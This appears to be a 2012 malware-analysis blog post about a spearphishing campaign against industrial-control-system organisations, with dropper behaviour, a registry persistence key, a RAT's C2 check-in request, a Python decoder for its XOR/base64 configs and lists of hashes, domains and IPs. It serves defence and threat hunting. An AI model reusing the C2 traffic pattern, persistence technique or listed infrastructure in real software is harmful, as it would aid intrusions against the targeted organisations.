Unveiling a spearphishing campaign and possible ramifications

June 12, 2012  |  Jaime Blasco

A few days ago, DigitalBond published information about an ongoing spearphishing campaign that affected one of their employees.

The attackers were using a pdf document related to ICS (Industrial Control Systems) security as a lure to compromise potential targets within the ICS community.

After analyzing the initial information provided, my friend Rubén Santamarta from IOActive and I investigated the binaries and the involved infrastructure further.

Analysis of the malware

As described in this analysis done by the DigitalBond folks, the mail contained a link to a zip file hosted on hxxp://research.digitalvortex.com/

Once uncompressed, we get the file Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.pdf.exe (md5: c6b95b178188b8c35d14bed40520e685):

https://www.virustotal.com/file/883b274e5f79f47e5d75afa940eb0c99d4a77526137cbc9a0af1581875e99b0d/analysis/

The file is a WinRAR SFX archive that unpacks the malware files to the user's Temp folder and displays the benign PDF file Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.pdf:

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\spoolsvr.exe (md5: 5ff3269faca4a67d1a4c537154aaad4b)

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.pdf

The dropped file spoolsvr.exe on VirusTotal:

https://www.virustotal.com/file/466bb7da773c7c200f87a8a06f143c6c6856e9ebc4347eb4afb096104bcd97b4/analysis/

The malware also creates a registry key to maintain persistence:

HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run

load = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\spoolsvr.exe

The file is a downloader that reads the configuration file from a remote server, in this case:

hxxp://hint.happyforever.com/logo.html

203.231.234.23

203.226.0.0 - 203.231.255.255

KRNIC

Korea Network Information Center

As described in the DigitalBond analysis, the HTML file carries its configuration values inside the HTML tags. The config values are base64-encoded and then XORed with the key 0x42.

In this file, the values are as follows:

download:;sleep:20;

and the body contains a PE file with new malware.

You can use a small script I created, parse_html_content.py (http://alienvault-labs-garage.googlecode.com/files/parse_html_content.py [no longer available]), to automatically extract the config values and the binary file from the HTML content, given the XOR key used. Example:

$ python parse_html_content.py logo.html 42

download:;sleep:20;

tanghl.exe

Binary file logo.html.exe saved

The downloaded file tanghl.exe is only detected by 3 AV engines:

https://www.virustotal.com/file/0eb7590c2188d995fb3f8394ee10db5856542cfac3a62fd3c8e54236f5ffd428/analysis/

This file is a RAT (Remote Access Tool) known as Backdoor:Win32/Dalbot.gen

This particular sample connects to the C&C server 1.234.1.68

1.224.0.0 - 1.255.255.255

SK Broadband Co Ltd

Jung-gu SK NamsanGreen Bldg,Namdaemunno 5(o)-ga, Seoul

The communication between the malware and the C&C is done using HTTP requests to random numeric .asp files. The RAT communication is carried in the Cookie header of the request, base64-encoded and XORed.

GET /8223.asp HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Host: 1.234.1.68

Connection: Keep-Alive

Cookie: CAQGBgoFD1YaHA4ZH1AIBwIOBR8ADhJWU1pcXlADBBgfBQoGDlYDCgUeDgcORgkIXVtcWVtQ

If we decode the value of the Cookie header (base64-decode it, then XOR each byte with the single-byte key 0x6b) we can see the actual check-in:

command=qwert;clientkey=8175;hostname=XXXXXX;
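The two encoding layers described above, the config values in the HTML file (base64, then XOR with 0x42) and the RAT check-in in the Cookie header (base64, then XOR with 0x6b), are the same construction with different keys. The following Python is an added example written for this post; it is neither the parse_html_content.py script nor any code from the malware. The HTML tag layout it parses (directives in the title, filename in a meta tag, payload in the body) is an assumption, since the post does not show where inside the page the values sit, and every sample (the PE stub, the HTML page, the request) is constructed here, with the redacted check-in string from the post re-encoded rather than the captured cookie reused.

```python
import base64
import re
from typing import Dict, Optional

# XOR keys reported in the write-up above.
CONFIG_XOR_KEY = 0x42  # HTML configuration files (logo.html, logo.png, ...)
COOKIE_XOR_KEY = 0x6B  # RAT check-in carried in the Cookie header


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR. XOR is its own inverse, so one routine encodes and decodes."""
    return bytes(b ^ key for b in data)


def decode_layer(encoded: str, key: int) -> bytes:
    """Reverse the observed encoding: base64-decode, then XOR every byte with key."""
    return xor_bytes(base64.b64decode(encoded), key)


def encode_layer(plain: bytes, key: int) -> str:
    """Forward direction; used here only to build the constructed samples below."""
    return base64.b64encode(xor_bytes(plain, key)).decode("ascii")


def parse_pairs(text: str, sep: str) -> Dict[str, str]:
    """Split 'name<sep>value;' lists such as 'download:;sleep:20;' into a dict."""
    pairs = {}
    for item in text.split(";"):
        if item:
            name, _, value = item.partition(sep)
            pairs[name] = value
    return pairs


def looks_like_pe(data: bytes) -> bool:
    """Check the MZ magic and that e_lfanew (offset 0x3C) points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


# --- Constructed samples (not captured from the campaign) -------------------
# Minimal PE-like header: MZ magic, e_lfanew = 0x40, PE signature at 0x40.
SAMPLE_PE = b"MZ" + bytes(58) + (0x40).to_bytes(4, "little") + b"PE\x00\x00" + bytes(20)

# Assumed tag layout: directives in <title>, filename in <meta>, payload in <body>.
SAMPLE_HTML = (
    "<html><head><title>"
    + encode_layer(b"download:;sleep:20;", CONFIG_XOR_KEY)
    + '</title><meta name="file" content="'
    + encode_layer(b"tanghl.exe", CONFIG_XOR_KEY)
    + '"></head><body>\n'
    + encode_layer(SAMPLE_PE, CONFIG_XOR_KEY)
    + "\n</body></html>"
)

# Check-in request shaped like the capture above; the redacted check-in string
# is re-encoded under the reported key instead of reusing the captured cookie.
SAMPLE_REQUEST = (
    "GET /8223.asp HTTP/1.1\r\n"
    "Host: 1.234.1.68\r\n"
    "Cookie: "
    + encode_layer(b"command=qwert;clientkey=8175;hostname=XXXXXX;", COOKIE_XOR_KEY)
    + "\r\n\r\n"
)


def parse_html_config(html: str, key: int) -> dict:
    """Recover the directives, the filename and the embedded payload from a config page."""
    title = re.search(r"<title>([^<]*)</title>", html).group(1)
    meta = re.search(r'<meta name="file" content="([^"]*)"', html).group(1)
    body = re.search(r"<body>(.*?)</body>", html, re.S).group(1).strip()
    payload = decode_layer(body, key)
    return {
        "config": parse_pairs(decode_layer(title, key).decode("ascii"), ":"),
        "filename": decode_layer(meta, key).decode("ascii"),
        "payload": payload,
        "payload_is_pe": looks_like_pe(payload),
    }


def extract_cookie(request: str) -> Optional[str]:
    """Pull the raw Cookie value out of an HTTP request header block."""
    match = re.search(r"^Cookie:\s*(\S+)\s*$", request, re.M)
    return match.group(1) if match else None


def decode_checkin(cookie: str, key: int = COOKIE_XOR_KEY) -> Optional[Dict[str, str]]:
    """Decode a Cookie value as a check-in; None when it does not fit the pattern.

    A legitimate cookie XORed with 0x6B almost never yields printable text that
    starts with 'command=', so this doubles as a retro-hunting filter over proxy logs.
    """
    try:
        plain = decode_layer(cookie, key).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    if not plain.isprintable() or not plain.startswith("command="):
        return None
    return parse_pairs(plain, "=")


if __name__ == "__main__":
    cfg = parse_html_config(SAMPLE_HTML, CONFIG_XOR_KEY)
    print(cfg["config"], cfg["filename"], cfg["payload_is_pe"])
    print(decode_checkin(extract_cookie(SAMPLE_REQUEST)))
```

Running it prints the parsed directives, the filename tanghl.exe and True for the PE check, followed by the decoded check-in fields. The decode_checkin filter is the piece worth lifting into a log pipeline: feed it every Cookie value seen on requests to numeric .asp paths and alert on anything that decodes to a printable command= string.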

Further investigations of the campaign

Using the information extracted from the binaries and the servers involved in the attack, we were able to identify more files and campaigns launched by this group during the last months.

The following binary (Romneys_Partner_Choice.exe, md5: 6306364c58f31a711c410c9a874f103c) downloads the config file from:

hxxp://update.slowblog.com/images/logo.png

The server update.slowblog.com was pointing to the same IP as hint.happyforever.com (203.231.234.23). The binary drops the following benign PDF file: Romneys_Partner_Choice.pdf.

Another file is f77852b73dfde33ea248df7087671f53, which downloads the config file from

hxxp://report.rawcomp.com/images/wait.png (also pointing to 203.231.234.23)

and drops China's_Rare-Earth_Industry.pdf.

Looking for other binaries connecting to the C&C ip address 1.234.1.68 we found the following:

53ae642408aaf6cfed016422b394b32a whose filename is the_list_of_staff_changes_in_anakam.exe

It downloads the config file from

hxxp://report.crabdance.com/report/news.html

210.249.80.141

210.248.0.0 - 210.255.255.255

Japan Network Information Center

The following files were getting the config file from the same server (report.crabdance.com):

MD5 (New_Chertoff_Group_Q1_2012_Report.zip) = e7b5596a08bda3592ed3978ef8d5bcdd

MD5 (Speeches_For_IT-SCC_Meeting.zip) = 094c72273d716302705218eea8b7829e

MD5 (Staff_Changes(URI).zip) = 6725ea60e45b85a63e0dd35f50b50a24

MD5 (Staff_Changes(cmu).zip) = cae33614eb014ed50ab5e1381547bd4a

MD5 (Staff_Changes(purdue).zip) = f108cacaaae8295d9fc602c51bef59cf

MD5 (New_NJVC_First_Half_2012_Report.zip) = 8f26609c275e0262b4833ccc7909779c

dropping the following exes:

MD5 (New NJVC First Half 2012 Report.exe) = f7aa931de0564f77b27c2f5d1d9bc532

MD5 (Any_Staff_Changes_About_Carnegie_Mellon_University.exe) = 8873f6d3ea123708615e72fe357808e5

MD5 (Any_Staff_Changes_About_Purdue_University.exe) = 8873f6d3ea123708615e72fe357808e5

MD5 (Any_Staff_Changes_About_University_of_Rhode_Island.exe) = 8873f6d3ea123708615e72fe357808e5

MD5 (New_Chertoff_Group_Q1_2012_Report.exe) = 59e74b14f5edee8d38eba74a8000fb18

MD5 (Speeches_For_IT-SCC_Meeting.exe) = 59e74b14f5edee8d38eba74a8000fb18

These downloaders obtain the config file from

hxxp://report.crabdance.com/report/news.html

hxxp://203.200.205.245/java/careers.html

hxxp://203.200.205.245/css/style.html

All of them obtain the same RAT and the following C&C ip addresses were present on the binaries:

1.234.1.68:80

143.89.35.7:80

143.89.0.0 - 143.89.255.255

Hong Kong University of Science and Technology

128.175.21.189:80

sql1.be.udel.edu (128.175.21.189)

128.175.0.0 - 128.175.255.255

Information Technologies

192 South Chapel Street

Newark, DE

US

More binaries were found connecting to the ip address 128.175.21.189:

1d8ff16257181562aec3a74ca79ce092 that drops the following doc file:

DRAFT_NEMA_Welcomes_Congressional_Approval_of_Legislation_Directing_DOT_to_Harmonize_with_International_Standards.doc

and gets the config file from release.pornandpot.com (128.175.21.189)

a8b2ac446c614fd5d4880d95369deb3b

hxxp://www.doversolutions.co.in/images/title.png (203.200.205.245)

81848edc70fa647789d78c1610b93135

hxxp://203.200.205.245/images/title.png (203.200.205.245)

8e3210d90e728cad7691a4ada11568a0

hxxp://203.200.205.245/images/title.png (203.200.205.245)

c12699e9ff4e150c10bcbd62219f2af6

hxxp://203.200.205.245/images/google.png

hxxp://173.10.48.242/html/WINWORD.gif

and uses 74.93.92.50 as the C&C server.

9a4cf6b89ce11566f7048223fb8cf638

hxxp://203.200.205.245/postinfo.html

36fec0bf34b49c09ec8d6cf12205953c

hxxp://203.200.205.245/default.htm

Other files connecting to the C&C server 74.93.92.50:

013649078c6498d27aa37ac8a739b20f

0e087ef59f698c7807e268759a3bbc71

Using the script to extract the information from the html config files, we found the following different configuration values:

sleep:122;

AcroRd32.exe

download:;

AcroRd32.exe

download:;sleep:20;

tanghl.exe

sleep:240;

Windows.exe

download:;

AcroRd32.exe

sleep:124;

ntdll.exe

sleep:20;

AcroRd32.exe

download:;

WINWORD.EXE

sleep:20;

WINWORD.EXE

Final notes

We have identified that the group behind these attacks is using hacked web servers to host the malicious configuration files. Based on the networks hosting the C&C IPs (mainly universities), it is very likely that these servers are also hacked and that some kind of proxy is installed on them to redirect the traffic to the real C&C server. This can be easily achieved using HTran or similar software commonly used by Chinese hacker groups in this kind of campaign.

If we take a look at the name of the identified files, we can build a short list of likely targets and/or their customers:

- Universities (Carnegie Mellon, Purdue University, Rhode Island)

- ICS related organizations (DigitalBond, NEMA [National Electrical Manufacturers Association])

- Government contractors (NJVC, Chertoff Group)

- Two-Factor Authentication technology (Anakam).

The use of configuration values inside HTML content is somewhat similar to what attackers used during Operation Shady RAT.

Apart from the modus operandi, we identified the C&C server 74.93.92.50. Based on the information provided at the following links:

http://www.secureworks.com/research/threats/htran/

http://pastebin.com/yKSQd5Z5

it seems that this IP is in some way related to the group behind the RSA breach.

If you remember, a month ago ICS-CERT published a note warning of a series of cyber intrusions targeting natural gas pipeline companies. Some days after that, information about a link between these attacks and the RSA breach was published: "The indicators DHS provided to hunt for the gas-pipeline attackers included several that, when we checked them, turned out to be related to those used by the perpetrators of the RSA attack," as the article puts it.

One way or another, it seems that ICS companies are beginning to be included in the shopping list of these kinds of groups.

You can also use the following OpenIOC file, http://alienvault-labs-garage.googlecode.com/files/d3b52fea-5020-469c-97f8-b23bf4954751.ioc [no longer available], which contains the indicators of compromise related to the data presented.

You can find more information on the IOActive blog.
